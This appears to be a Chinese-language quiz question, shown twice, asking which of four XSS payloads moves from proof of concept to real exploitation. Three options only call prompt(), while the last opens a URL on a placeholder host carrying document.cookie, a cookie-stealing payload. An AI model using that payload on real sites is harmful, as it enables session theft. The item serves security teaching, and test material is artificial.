哪一个 XSS payload 不是止于概念验证(POC),而是进行了漏洞利用?()
哪一个 XSS payload 不是止于概念验证(POC),而是进行了漏洞利用?()
?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500)
?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '<script>prompt(location.href)</script>';}})
x=document.writeln(%22%3Ciframe%3E%3C/iframe%3E%22);let%20f=document.querySelector(%27iframe%27);f.contentWindow.prompt(location);
?x=window.open('http://xxx.me:8080/cookie.asp?msg='+document.cookie)